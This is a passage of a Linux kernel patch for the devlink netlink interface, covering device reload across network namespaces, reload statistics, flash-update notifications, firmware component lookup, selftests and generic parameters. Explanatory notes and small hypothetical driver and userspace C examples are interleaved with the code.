++		resource_list = &devlink->resource_list;
++
++	list_for_each_entry(resource, resource_list, list) {
++		if (!resource->size_valid)
++			return -EINVAL;
++		err = devlink_resources_validate(devlink, resource, info);
++		if (err)
++			return err;
++	}
++	return err;
++}
++
++static struct net *devlink_netns_get(struct sk_buff *skb,
++				     struct genl_info *info)
++{
++	struct nlattr *netns_pid_attr = info->attrs[DEVLINK_ATTR_NETNS_PID];
++	struct nlattr *netns_fd_attr = info->attrs[DEVLINK_ATTR_NETNS_FD];
++	struct nlattr *netns_id_attr = info->attrs[DEVLINK_ATTR_NETNS_ID];
++	struct net *net;
++
++	if (!!netns_pid_attr + !!netns_fd_attr + !!netns_id_attr > 1) {
++		NL_SET_ERR_MSG_MOD(info->extack, "multiple netns identifying attributes specified");
++		return ERR_PTR(-EINVAL);
++	}
++
++	if (netns_pid_attr) {
++		net = get_net_ns_by_pid(nla_get_u32(netns_pid_attr));
++	} else if (netns_fd_attr) {
++		net = get_net_ns_by_fd(nla_get_u32(netns_fd_attr));
++	} else if (netns_id_attr) {
++		net = get_net_ns_by_id(sock_net(skb->sk),
++				       nla_get_u32(netns_id_attr));
++		if (!net)
++			net = ERR_PTR(-EINVAL);
++	} else {
++		WARN_ON(1);
++		net = ERR_PTR(-EINVAL);
++	}
++	if (IS_ERR(net)) {
++		NL_SET_ERR_MSG_MOD(info->extack, "Unknown network namespace");
++		return ERR_PTR(-EINVAL);
++	}
++	if (!netlink_ns_capable(skb, net->user_ns, CAP_NET_ADMIN)) {
++		put_net(net);
++		return ERR_PTR(-EPERM);
++	}
++	return net;
++}
++
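++/* devlink_netns_get() above resolves the reload target namespace from
++ * exactly one of the PID, fd or netnsid attributes and requires
++ * CAP_NET_ADMIN in the target namespace. In iproute2 this should map
++ * to `devlink dev reload DEV netns { PID | NAME | ID }`, if I recall
++ * the tool's syntax correctly.
++ */
++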
++static void devlink_param_notify(struct devlink *devlink,
++				 unsigned int port_index,
++				 struct devlink_param_item *param_item,
++				 enum devlink_command cmd);
++
++static void devlink_ns_change_notify(struct devlink *devlink,
++				     struct net *dest_net, struct net *curr_net,
++				     bool new)
++{
++	struct devlink_param_item *param_item;
++	enum devlink_command cmd;
++
++	/* Userspace needs to be notified about devlink objects
++	 * removed from the original network namespace and entering
++	 * the new one. The rest of the devlink objects are re-created
++	 * during the reload process, so those notifications are
++	 * generated separately.
++	 */
++
++	if (!dest_net || net_eq(dest_net, curr_net))
++		return;
++
++	if (new)
++		devlink_notify(devlink, DEVLINK_CMD_NEW);
++
++	cmd = new ? DEVLINK_CMD_PARAM_NEW : DEVLINK_CMD_PARAM_DEL;
++	list_for_each_entry(param_item, &devlink->param_list, list)
++		devlink_param_notify(devlink, 0, param_item, cmd);
++
++	if (!new)
++		devlink_notify(devlink, DEVLINK_CMD_DEL);
++}
++
++static bool devlink_reload_supported(const struct devlink_ops *ops)
++{
++	return ops->reload_down && ops->reload_up;
++}
++
++static void devlink_reload_failed_set(struct devlink *devlink,
++				      bool reload_failed)
++{
++	if (devlink->reload_failed == reload_failed)
++		return;
++	devlink->reload_failed = reload_failed;
++	devlink_notify(devlink, DEVLINK_CMD_NEW);
++}
++
++bool devlink_is_reload_failed(const struct devlink *devlink)
++{
++	return devlink->reload_failed;
++}
++EXPORT_SYMBOL_GPL(devlink_is_reload_failed);
++
++static void
++__devlink_reload_stats_update(struct devlink *devlink, u32 *reload_stats,
++			      enum devlink_reload_limit limit, u32 actions_performed)
++{
++	unsigned long actions = actions_performed;
++	int stat_idx;
++	int action;
++
++	for_each_set_bit(action, &actions, __DEVLINK_RELOAD_ACTION_MAX) {
++		stat_idx = limit * __DEVLINK_RELOAD_ACTION_MAX + action;
++		reload_stats[stat_idx]++;
++	}
++	devlink_notify(devlink, DEVLINK_CMD_NEW);
++}
++
++static void
++devlink_reload_stats_update(struct devlink *devlink, enum devlink_reload_limit limit,
++			    u32 actions_performed)
++{
++	__devlink_reload_stats_update(devlink, devlink->stats.reload_stats, limit,
++				      actions_performed);
++}
++
++/**
++ *	devlink_remote_reload_actions_performed - Update devlink on reload actions
++ *	  performed which are not a direct result of devlink reload call.
++ *
++ *	@devlink: devlink
++ *	@limit: reload limit
++ *	@actions_performed: bitmask of actions performed
++ *
++ *	This should be called by a driver after performing reload actions that were not
++ *	the result of a devlink reload call. For example, fw_activate was performed because
++ *	a devlink reload triggered fw_activate on another host.
++ *	The motivation for this function is to keep track of reload actions performed on this
++ *	device, whether they were done due to a direct devlink reload call or not.
++ */
++void devlink_remote_reload_actions_performed(struct devlink *devlink,
++					     enum devlink_reload_limit limit,
++					     u32 actions_performed)
++{
++	if (WARN_ON(!actions_performed ||
++		    actions_performed & BIT(DEVLINK_RELOAD_ACTION_UNSPEC) ||
++		    actions_performed >= BIT(__DEVLINK_RELOAD_ACTION_MAX) ||
++		    limit > DEVLINK_RELOAD_LIMIT_MAX))
++		return;
++
++	__devlink_reload_stats_update(devlink, devlink->stats.remote_reload_stats, limit,
++				      actions_performed);
++}
++EXPORT_SYMBOL_GPL(devlink_remote_reload_actions_performed);
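
A hypothetical driver fragment showing where this export is meant to be
called from: an event handler that learns firmware was activated by the
peer host rather than by a local devlink reload. The handler name and
context are made up; the devlink call and the enum values come from the
devlink UAPI.

static void example_peer_fw_activated(struct devlink *devlink)
{
	/* Record a fw_activate this host did not initiate itself. */
	devlink_remote_reload_actions_performed(devlink,
						DEVLINK_RELOAD_LIMIT_UNSPEC,
						BIT(DEVLINK_RELOAD_ACTION_FW_ACTIVATE));
}
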
++
++static int devlink_reload(struct devlink *devlink, struct net *dest_net,
++			  enum devlink_reload_action action, enum devlink_reload_limit limit,
++			  u32 *actions_performed, struct netlink_ext_ack *extack)
++{
++	u32 remote_reload_stats[DEVLINK_RELOAD_STATS_ARRAY_SIZE];
++	struct net *curr_net;
++	int err;
++
++	memcpy(remote_reload_stats, devlink->stats.remote_reload_stats,
++	       sizeof(remote_reload_stats));
++
++	curr_net = devlink_net(devlink);
++	devlink_ns_change_notify(devlink, dest_net, curr_net, false);
++	err = devlink->ops->reload_down(devlink, !!dest_net, action, limit, extack);
++	if (err)
++		return err;
++
++	if (dest_net && !net_eq(dest_net, curr_net))
++		write_pnet(&devlink->_net, dest_net);
++
++	err = devlink->ops->reload_up(devlink, action, limit, actions_performed, extack);
++	devlink_reload_failed_set(devlink, !!err);
++	if (err)
++		return err;
++
++	devlink_ns_change_notify(devlink, dest_net, curr_net, true);
++	WARN_ON(!(*actions_performed & BIT(action)));
++	/* Catch drivers that update the remote reload stats from within a devlink reload */
++	WARN_ON(memcmp(remote_reload_stats, devlink->stats.remote_reload_stats,
++		       sizeof(remote_reload_stats)));
++	devlink_reload_stats_update(devlink, limit, *actions_performed);
++	return 0;
++}
++
++static int
++devlink_nl_reload_actions_performed_snd(struct devlink *devlink, u32 actions_performed,
++					enum devlink_command cmd, struct genl_info *info)
++{
++	struct sk_buff *msg;
++	void *hdr;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	hdr = genlmsg_put(msg, info->snd_portid, info->snd_seq, &devlink_nl_family, 0, cmd);
++	if (!hdr)
++		goto free_msg;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	if (nla_put_bitfield32(msg, DEVLINK_ATTR_RELOAD_ACTIONS_PERFORMED, actions_performed,
++			       actions_performed))
++		goto nla_put_failure;
++	genlmsg_end(msg, hdr);
++
++	return genlmsg_reply(msg, info);
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++free_msg:
++	nlmsg_free(msg);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_reload(struct sk_buff *skb, struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	enum devlink_reload_action action;
++	enum devlink_reload_limit limit;
++	struct net *dest_net = NULL;
++	u32 actions_performed;
++	int err;
++
++	if (!(devlink->features & DEVLINK_F_RELOAD))
++		return -EOPNOTSUPP;
++
++	err = devlink_resources_validate(devlink, NULL, info);
++	if (err) {
++		NL_SET_ERR_MSG_MOD(info->extack, "resources size validation failed");
++		return err;
++	}
++
++	if (info->attrs[DEVLINK_ATTR_RELOAD_ACTION])
++		action = nla_get_u8(info->attrs[DEVLINK_ATTR_RELOAD_ACTION]);
++	else
++		action = DEVLINK_RELOAD_ACTION_DRIVER_REINIT;
++
++	if (!devlink_reload_action_is_supported(devlink, action)) {
++		NL_SET_ERR_MSG_MOD(info->extack,
++				   "Requested reload action is not supported by the driver");
++		return -EOPNOTSUPP;
++	}
++
++	limit = DEVLINK_RELOAD_LIMIT_UNSPEC;
++	if (info->attrs[DEVLINK_ATTR_RELOAD_LIMITS]) {
++		struct nla_bitfield32 limits;
++		u32 limits_selected;
++
++		limits = nla_get_bitfield32(info->attrs[DEVLINK_ATTR_RELOAD_LIMITS]);
++		limits_selected = limits.value & limits.selector;
++		if (!limits_selected) {
++			NL_SET_ERR_MSG_MOD(info->extack, "Invalid limit selected");
++			return -EINVAL;
++		}
++		for (limit = 0; limit <= DEVLINK_RELOAD_LIMIT_MAX; limit++)
++			if (limits_selected & BIT(limit))
++				break;
++		/* UAPI enables multiselection, but currently it is not used */
++		if (limits_selected != BIT(limit)) {
++			NL_SET_ERR_MSG_MOD(info->extack,
++					   "Multiselection of limit is not supported");
++			return -EOPNOTSUPP;
++		}
++		if (!devlink_reload_limit_is_supported(devlink, limit)) {
++			NL_SET_ERR_MSG_MOD(info->extack,
++					   "Requested limit is not supported by the driver");
++			return -EOPNOTSUPP;
++		}
++		if (devlink_reload_combination_is_invalid(action, limit)) {
++			NL_SET_ERR_MSG_MOD(info->extack,
++					   "Requested limit is invalid for this action");
++			return -EINVAL;
++		}
++	}
++	if (info->attrs[DEVLINK_ATTR_NETNS_PID] ||
++	    info->attrs[DEVLINK_ATTR_NETNS_FD] ||
++	    info->attrs[DEVLINK_ATTR_NETNS_ID]) {
++		dest_net = devlink_netns_get(skb, info);
++		if (IS_ERR(dest_net))
++			return PTR_ERR(dest_net);
++	}
++
++	err = devlink_reload(devlink, dest_net, action, limit, &actions_performed, info->extack);
++
++	if (dest_net)
++		put_net(dest_net);
++
++	if (err)
++		return err;
++	/* For backward compatibility, generate a reply only if the user passed the new attributes */
++	if (!info->attrs[DEVLINK_ATTR_RELOAD_ACTION] && !info->attrs[DEVLINK_ATTR_RELOAD_LIMITS])
++		return 0;
++
++	return devlink_nl_reload_actions_performed_snd(devlink, actions_performed,
++						       DEVLINK_CMD_RELOAD, info);
++}
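
The limit parsing above relies on struct nla_bitfield32 semantics:
only bits set in .selector are meaningful, .value carries their state,
so the effective selection is value & selector, and exactly one bit may
survive. A standalone userspace sketch of that check:

#include <stdio.h>

struct bitfield32 { unsigned int value, selector; };

int main(void)
{
	struct bitfield32 limits = { .value = 0x2, .selector = 0x2 };
	unsigned int selected = limits.value & limits.selector;
	int limit;

	if (!selected) {
		fprintf(stderr, "invalid limit selected\n");
		return 1;
	}
	for (limit = 0; limit < 32; limit++)
		if (selected & (1u << limit))
			break;
	/* reject multiselection, as the kernel code does */
	if (selected != (1u << limit)) {
		fprintf(stderr, "multiselection is not supported\n");
		return 1;
	}
	printf("selected limit bit: %d\n", limit);
	return 0;
}
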
++
++static int devlink_nl_flash_update_fill(struct sk_buff *msg,
++					struct devlink *devlink,
++					enum devlink_command cmd,
++					struct devlink_flash_notify *params)
++{
++	void *hdr;
++
++	hdr = genlmsg_put(msg, 0, 0, &devlink_nl_family, 0, cmd);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto nla_put_failure;
++
++	if (cmd != DEVLINK_CMD_FLASH_UPDATE_STATUS)
++		goto out;
++
++	if (params->status_msg &&
++	    nla_put_string(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_MSG,
++			   params->status_msg))
++		goto nla_put_failure;
++	if (params->component &&
++	    nla_put_string(msg, DEVLINK_ATTR_FLASH_UPDATE_COMPONENT,
++			   params->component))
++		goto nla_put_failure;
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_DONE,
++			      params->done, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_TOTAL,
++			      params->total, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_FLASH_UPDATE_STATUS_TIMEOUT,
++			      params->timeout, DEVLINK_ATTR_PAD))
++		goto nla_put_failure;
++
++out:
++	genlmsg_end(msg, hdr);
++	return 0;
++
++nla_put_failure:
++	genlmsg_cancel(msg, hdr);
++	return -EMSGSIZE;
++}
++
++static void __devlink_flash_update_notify(struct devlink *devlink,
++					  enum devlink_command cmd,
++					  struct devlink_flash_notify *params)
++{
++	struct sk_buff *msg;
++	int err;
++
++	WARN_ON(cmd != DEVLINK_CMD_FLASH_UPDATE &&
++		cmd != DEVLINK_CMD_FLASH_UPDATE_END &&
++		cmd != DEVLINK_CMD_FLASH_UPDATE_STATUS);
++
++	if (!xa_get_mark(&devlinks, devlink->index, DEVLINK_REGISTERED))
++		return;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return;
++
++	err = devlink_nl_flash_update_fill(msg, devlink, cmd, params);
++	if (err)
++		goto out_free_msg;
++
++	genlmsg_multicast_netns(&devlink_nl_family, devlink_net(devlink),
++				msg, 0, DEVLINK_MCGRP_CONFIG, GFP_KERNEL);
++	return;
++
++out_free_msg:
++	nlmsg_free(msg);
++}
++
++static void devlink_flash_update_begin_notify(struct devlink *devlink)
++{
++	struct devlink_flash_notify params = {};
++
++	__devlink_flash_update_notify(devlink,
++				      DEVLINK_CMD_FLASH_UPDATE,
++				      &params);
++}
++
++static void devlink_flash_update_end_notify(struct devlink *devlink)
++{
++	struct devlink_flash_notify params = {};
++
++	__devlink_flash_update_notify(devlink,
++				      DEVLINK_CMD_FLASH_UPDATE_END,
++				      &params);
++}
++
++void devlink_flash_update_status_notify(struct devlink *devlink,
++					const char *status_msg,
++					const char *component,
++					unsigned long done,
++					unsigned long total)
++{
++	struct devlink_flash_notify params = {
++		.status_msg = status_msg,
++		.component = component,
++		.done = done,
++		.total = total,
++	};
++
++	__devlink_flash_update_notify(devlink,
++				      DEVLINK_CMD_FLASH_UPDATE_STATUS,
++				      &params);
++}
++EXPORT_SYMBOL_GPL(devlink_flash_update_status_notify);
++
++void devlink_flash_update_timeout_notify(struct devlink *devlink,
++					 const char *status_msg,
++					 const char *component,
++					 unsigned long timeout)
++{
++	struct devlink_flash_notify params = {
++		.status_msg = status_msg,
++		.component = component,
++		.timeout = timeout,
++	};
++
++	__devlink_flash_update_notify(devlink,
++				      DEVLINK_CMD_FLASH_UPDATE_STATUS,
++				      &params);
++}
++EXPORT_SYMBOL_GPL(devlink_flash_update_timeout_notify);
++
++struct devlink_info_req {
++	struct sk_buff *msg;
++	void (*version_cb)(const char *version_name,
++			   enum devlink_info_version_type version_type,
++			   void *version_cb_priv);
++	void *version_cb_priv;
++};
++
++struct devlink_flash_component_lookup_ctx {
++	const char *lookup_name;
++	bool lookup_name_found;
++};
++
++static void
++devlink_flash_component_lookup_cb(const char *version_name,
++				  enum devlink_info_version_type version_type,
++				  void *version_cb_priv)
++{
++	struct devlink_flash_component_lookup_ctx *lookup_ctx = version_cb_priv;
++
++	if (version_type != DEVLINK_INFO_VERSION_TYPE_COMPONENT ||
++	    lookup_ctx->lookup_name_found)
++		return;
++
++	lookup_ctx->lookup_name_found =
++		!strcmp(lookup_ctx->lookup_name, version_name);
++}
++
++static int devlink_flash_component_get(struct devlink *devlink,
++				       struct nlattr *nla_component,
++				       const char **p_component,
++				       struct netlink_ext_ack *extack)
++{
++	struct devlink_flash_component_lookup_ctx lookup_ctx = {};
++	struct devlink_info_req req = {};
++	const char *component;
++	int ret;
++
++	if (!nla_component)
++		return 0;
++
++	component = nla_data(nla_component);
++
++	if (!devlink->ops->info_get) {
++		NL_SET_ERR_MSG_ATTR(extack, nla_component,
++				    "component update is not supported by this device");
++		return -EOPNOTSUPP;
++	}
++
++	lookup_ctx.lookup_name = component;
++	req.version_cb = devlink_flash_component_lookup_cb;
++	req.version_cb_priv = &lookup_ctx;
++
++	ret = devlink->ops->info_get(devlink, &req, NULL);
++	if (ret)
++		return ret;
++
++	if (!lookup_ctx.lookup_name_found) {
++		NL_SET_ERR_MSG_ATTR(extack, nla_component,
++				    "selected component is not supported by this device");
++		return -EINVAL;
++	}
++	*p_component = component;
++	return 0;
++}
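
For this lookup to succeed, the driver's info_get callback has to
report the component name with the COMPONENT version type; that is what
reaches devlink_flash_component_lookup_cb() through the req->version_cb
hook (see devlink_info_version_put() further down). A hypothetical
driver callback, with a made-up component name and version:

static int example_info_get(struct devlink *devlink,
			    struct devlink_info_req *req,
			    struct netlink_ext_ack *extack)
{
	/* The COMPONENT type is what makes "fw.bundle" flashable. */
	return devlink_info_version_running_put_ext(req, "fw.bundle",
						    "1.2.3",
						    DEVLINK_INFO_VERSION_TYPE_COMPONENT);
}
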
++
++static int devlink_nl_cmd_flash_update(struct sk_buff *skb,
++				       struct genl_info *info)
++{
++	struct nlattr *nla_overwrite_mask, *nla_file_name;
++	struct devlink_flash_update_params params = {};
++	struct devlink *devlink = info->user_ptr[0];
++	const char *file_name;
++	u32 supported_params;
++	int ret;
++
++	if (!devlink->ops->flash_update)
++		return -EOPNOTSUPP;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_FLASH_UPDATE_FILE_NAME))
++		return -EINVAL;
++
++	ret = devlink_flash_component_get(devlink,
++					  info->attrs[DEVLINK_ATTR_FLASH_UPDATE_COMPONENT],
++					  &params.component, info->extack);
++	if (ret)
++		return ret;
++
++	supported_params = devlink->ops->supported_flash_update_params;
++
++	nla_overwrite_mask = info->attrs[DEVLINK_ATTR_FLASH_UPDATE_OVERWRITE_MASK];
++	if (nla_overwrite_mask) {
++		struct nla_bitfield32 sections;
++
++		if (!(supported_params & DEVLINK_SUPPORT_FLASH_UPDATE_OVERWRITE_MASK)) {
++			NL_SET_ERR_MSG_ATTR(info->extack, nla_overwrite_mask,
++					    "overwrite settings are not supported by this device");
++			return -EOPNOTSUPP;
++		}
++		sections = nla_get_bitfield32(nla_overwrite_mask);
++		params.overwrite_mask = sections.value & sections.selector;
++	}
++
++	nla_file_name = info->attrs[DEVLINK_ATTR_FLASH_UPDATE_FILE_NAME];
++	file_name = nla_data(nla_file_name);
++	ret = request_firmware(&params.fw, file_name, devlink->dev);
++	if (ret) {
++		NL_SET_ERR_MSG_ATTR(info->extack, nla_file_name, "failed to locate the requested firmware file");
++		return ret;
++	}
++
++	devlink_flash_update_begin_notify(devlink);
++	ret = devlink->ops->flash_update(devlink, &params, info->extack);
++	devlink_flash_update_end_notify(devlink);
++
++	release_firmware(params.fw);
++
++	return ret;
++}
++
++static int
++devlink_nl_selftests_fill(struct sk_buff *msg, struct devlink *devlink,
++			  u32 portid, u32 seq, int flags,
++			  struct netlink_ext_ack *extack)
++{
++	struct nlattr *selftests;
++	void *hdr;
++	int err;
++	int i;
++
++	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags,
++			  DEVLINK_CMD_SELFTESTS_GET);
++	if (!hdr)
++		return -EMSGSIZE;
++
++	err = -EMSGSIZE;
++	if (devlink_nl_put_handle(msg, devlink))
++		goto err_cancel_msg;
++
++	selftests = nla_nest_start(msg, DEVLINK_ATTR_SELFTESTS);
++	if (!selftests)
++		goto err_cancel_msg;
++
++	for (i = DEVLINK_ATTR_SELFTEST_ID_UNSPEC + 1;
++	     i <= DEVLINK_ATTR_SELFTEST_ID_MAX; i++) {
++		if (devlink->ops->selftest_check(devlink, i, extack)) {
++			err = nla_put_flag(msg, i);
++			if (err)
++				goto err_cancel_msg;
++		}
++	}
++
++	nla_nest_end(msg, selftests);
++	genlmsg_end(msg, hdr);
++	return 0;
++
++err_cancel_msg:
++	genlmsg_cancel(msg, hdr);
++	return err;
++}
++
++static int devlink_nl_cmd_selftests_get_doit(struct sk_buff *skb,
++					     struct genl_info *info)
++{
++	struct devlink *devlink = info->user_ptr[0];
++	struct sk_buff *msg;
++	int err;
++
++	if (!devlink->ops->selftest_check)
++		return -EOPNOTSUPP;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = devlink_nl_selftests_fill(msg, devlink, info->snd_portid,
++					info->snd_seq, 0, info->extack);
++	if (err) {
++		nlmsg_free(msg);
++		return err;
++	}
++
++	return genlmsg_reply(msg, info);
++}
++
++static int devlink_nl_cmd_selftests_get_dumpit(struct sk_buff *msg,
++					       struct netlink_callback *cb)
++{
++	struct devlink *devlink;
++	int start = cb->args[0];
++	unsigned long index;
++	int idx = 0;
++	int err = 0;
++
++	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
++		if (idx < start || !devlink->ops->selftest_check)
++			goto inc;
++
++		devl_lock(devlink);
++		err = devlink_nl_selftests_fill(msg, devlink,
++						NETLINK_CB(cb->skb).portid,
++						cb->nlh->nlmsg_seq, NLM_F_MULTI,
++						cb->extack);
++		devl_unlock(devlink);
++		if (err) {
++			devlink_put(devlink);
++			break;
++		}
++inc:
++		idx++;
++		devlink_put(devlink);
++	}
++
++	if (err != -EMSGSIZE)
++		return err;
++
++	cb->args[0] = idx;
++	return msg->len;
++}
++
++static int devlink_selftest_result_put(struct sk_buff *skb, unsigned int id,
++				       enum devlink_selftest_status test_status)
++{
++	struct nlattr *result_attr;
++
++	result_attr = nla_nest_start(skb, DEVLINK_ATTR_SELFTEST_RESULT);
++	if (!result_attr)
++		return -EMSGSIZE;
++
++	if (nla_put_u32(skb, DEVLINK_ATTR_SELFTEST_RESULT_ID, id) ||
++	    nla_put_u8(skb, DEVLINK_ATTR_SELFTEST_RESULT_STATUS,
++		       test_status))
++		goto nla_put_failure;
++
++	nla_nest_end(skb, result_attr);
++	return 0;
++
++nla_put_failure:
++	nla_nest_cancel(skb, result_attr);
++	return -EMSGSIZE;
++}
++
++static int devlink_nl_cmd_selftests_run(struct sk_buff *skb,
++					struct genl_info *info)
++{
++	struct nlattr *tb[DEVLINK_ATTR_SELFTEST_ID_MAX + 1];
++	struct devlink *devlink = info->user_ptr[0];
++	struct nlattr *attrs, *selftests;
++	struct sk_buff *msg;
++	void *hdr;
++	int err;
++	int i;
++
++	if (!devlink->ops->selftest_run || !devlink->ops->selftest_check)
++		return -EOPNOTSUPP;
++
++	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_SELFTESTS))
++		return -EINVAL;
++
++	attrs = info->attrs[DEVLINK_ATTR_SELFTESTS];
++
++	err = nla_parse_nested(tb, DEVLINK_ATTR_SELFTEST_ID_MAX, attrs,
++			       devlink_selftest_nl_policy, info->extack);
++	if (err < 0)
++		return err;
++
++	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
++	if (!msg)
++		return -ENOMEM;
++
++	err = -EMSGSIZE;
++	hdr = genlmsg_put(msg, info->snd_portid, info->snd_seq,
++			  &devlink_nl_family, 0, DEVLINK_CMD_SELFTESTS_RUN);
++	if (!hdr)
++		goto free_msg;
++
++	if (devlink_nl_put_handle(msg, devlink))
++		goto genlmsg_cancel;
++
++	selftests = nla_nest_start(msg, DEVLINK_ATTR_SELFTESTS);
++	if (!selftests)
++		goto genlmsg_cancel;
++
++	for (i = DEVLINK_ATTR_SELFTEST_ID_UNSPEC + 1;
++	     i <= DEVLINK_ATTR_SELFTEST_ID_MAX; i++) {
++		enum devlink_selftest_status test_status;
++
++		if (nla_get_flag(tb[i])) {
++			if (!devlink->ops->selftest_check(devlink, i,
++							  info->extack)) {
++				if (devlink_selftest_result_put(msg, i,
++								DEVLINK_SELFTEST_STATUS_SKIP))
++					goto selftests_nest_cancel;
++				continue;
++			}
++
++			test_status = devlink->ops->selftest_run(devlink, i,
++								 info->extack);
++			if (devlink_selftest_result_put(msg, i, test_status))
++				goto selftests_nest_cancel;
++		}
++	}
++
++	nla_nest_end(msg, selftests);
++	genlmsg_end(msg, hdr);
++	return genlmsg_reply(msg, info);
++
++selftests_nest_cancel:
++	nla_nest_cancel(msg, selftests);
++genlmsg_cancel:
++	genlmsg_cancel(msg, hdr);
++free_msg:
++	nlmsg_free(msg);
++	return err;
++}
++
++static const struct devlink_param devlink_param_generic[] = {
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_INT_ERR_RESET,
++		.name = DEVLINK_PARAM_GENERIC_INT_ERR_RESET_NAME,
++		.type = DEVLINK_PARAM_GENERIC_INT_ERR_RESET_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_MAX_MACS,
++		.name = DEVLINK_PARAM_GENERIC_MAX_MACS_NAME,
++		.type = DEVLINK_PARAM_GENERIC_MAX_MACS_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_SRIOV,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_SRIOV_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_SRIOV_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_REGION_SNAPSHOT,
++		.name = DEVLINK_PARAM_GENERIC_REGION_SNAPSHOT_NAME,
++		.type = DEVLINK_PARAM_GENERIC_REGION_SNAPSHOT_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_IGNORE_ARI,
++		.name = DEVLINK_PARAM_GENERIC_IGNORE_ARI_NAME,
++		.type = DEVLINK_PARAM_GENERIC_IGNORE_ARI_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_MSIX_VEC_PER_PF_MAX,
++		.name = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MAX_NAME,
++		.type = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MAX_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_MSIX_VEC_PER_PF_MIN,
++		.name = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MIN_NAME,
++		.type = DEVLINK_PARAM_GENERIC_MSIX_VEC_PER_PF_MIN_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_FW_LOAD_POLICY,
++		.name = DEVLINK_PARAM_GENERIC_FW_LOAD_POLICY_NAME,
++		.type = DEVLINK_PARAM_GENERIC_FW_LOAD_POLICY_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_RESET_DEV_ON_DRV_PROBE,
++		.name = DEVLINK_PARAM_GENERIC_RESET_DEV_ON_DRV_PROBE_NAME,
++		.type = DEVLINK_PARAM_GENERIC_RESET_DEV_ON_DRV_PROBE_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_ROCE,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_ROCE_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_ROCE_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_REMOTE_DEV_RESET,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_REMOTE_DEV_RESET_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_REMOTE_DEV_RESET_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_ETH,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_ETH_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_ETH_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_RDMA,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_RDMA_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_RDMA_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_VNET,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_VNET_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_VNET_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_ENABLE_IWARP,
++		.name = DEVLINK_PARAM_GENERIC_ENABLE_IWARP_NAME,
++		.type = DEVLINK_PARAM_GENERIC_ENABLE_IWARP_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_IO_EQ_SIZE,
++		.name = DEVLINK_PARAM_GENERIC_IO_EQ_SIZE_NAME,
++		.type = DEVLINK_PARAM_GENERIC_IO_EQ_SIZE_TYPE,
++	},
++	{
++		.id = DEVLINK_PARAM_GENERIC_ID_EVENT_EQ_SIZE,
++		.name = DEVLINK_PARAM_GENERIC_EVENT_EQ_SIZE_NAME,
++		.type = DEVLINK_PARAM_GENERIC_EVENT_EQ_SIZE_TYPE,
++	},
++};
++
++static int devlink_param_generic_verify(const struct devlink_param *param)
++{
++	/* verify that it matches a generic parameter by id and name */
++	if (param->id > DEVLINK_PARAM_GENERIC_ID_MAX)
++		return -EINVAL;
++	if (strcmp(param->name, devlink_param_generic[param->id].name))
++		return -ENOENT;
++
++	WARN_ON(param->type != devlink_param_generic[param->id].type);
++
++	return 0;
++}
++
++static int devlink_param_driver_verify(const struct devlink_param *param)
++{
++	int i;
++
++	if (param->id <= DEVLINK_PARAM_GENERIC_ID_MAX)
++		return -EINVAL;
++	/* verify no such name in generic params */
++	for (i = 0; i <= DEVLINK_PARAM_GENERIC_ID_MAX; i++)
++		if (!strcmp(param->name, devlink_param_generic[i].name))
++			return -EEXIST;
++
